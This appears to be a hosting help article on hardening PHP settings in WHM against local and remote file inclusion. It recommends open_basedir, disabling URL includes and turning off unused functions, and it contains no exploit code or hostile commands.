There might be some loopholes within the web applications programmed in PHP which can be exploited by external sources. Your system might contain the following list of vulnerabilities:
You can improve the security of your server’s PHP setting using the list of options given below.
Web applications that include scripts and files often contain a file-inclusion vulnerability which are used by malicious users to access your system. There might be certain applications that have not validated require and include statements. They might also have filenames for parameters. A file within the server may be replaced by a rogue file containing a similar name. There are two types of File inclusion attacks: Remote File Inclusion (RFI) and Local File Inclusion (LFI).
An attacker might run local files through a PHP script so that all kinds of restricted information is revealed about your server.
You can use the open_basedir feature to restrict the effect of local file inclusion vulnerabilities in PHP scripts. The option can be found in WHM’s PHP open_basedir Tweak interface located at WHM > Home > Security Center > PHP open_basedir Tweak. This feature prevents an attacker from accessing your system’s directories and prohibits the creation of local file inclusions.
Files on you server can be accessed from a remote location by a malicious user. A PHP script might be uploaded to your server by the attacker. The inclusion loopholes can be then be used to gain access using remote inclusion method. The attacker will be able to run harmful programs from their systems through the faulty PHP settings. They might be able to bypass the reading and writing permission of your system.
To avoid such exploits, you can deactivate the allow_url_include and allow_url_fopen options. They are available within WHM’s PHP Security Concepts interface under the Advanced Mode section. Go to WHM > Home > Service Configuration > PHP Configuration Editor.
It is recommended that you deactivate certain PHP functions if they are not used by the developers. They can be harmful for a production environment as they might be used by an attacker.
Enter the functions that you want to deactivate into the disable_functions text box. It is available under the Advanced Mode section in WHM’s WHM’s PHP Security Concepts interface.
Ensure that your system is safely protected tweaking the settings related to PHP. The vulnerabilities can be overcome using the various options available in WHM’s Advanced Mode.